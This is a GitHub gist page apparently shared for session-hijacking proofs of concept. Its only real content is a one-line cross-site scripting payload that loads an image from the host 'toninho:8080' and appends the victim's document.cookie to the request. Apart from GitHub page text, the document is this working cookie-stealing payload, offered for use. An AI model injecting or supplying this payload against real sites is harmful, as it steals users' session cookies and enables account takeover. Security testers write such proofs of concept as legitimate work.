Created
March 6, 2019 12:41
-
-
Save cgimenes/430b6c341cd2b9b11c9c46ef721a036c to your computer and use it in GitHub Desktop.
Simple script for session hijacking PoCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>document.createElement("img").src = "http://toninho:8080/?cookie="+document.cookie;</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment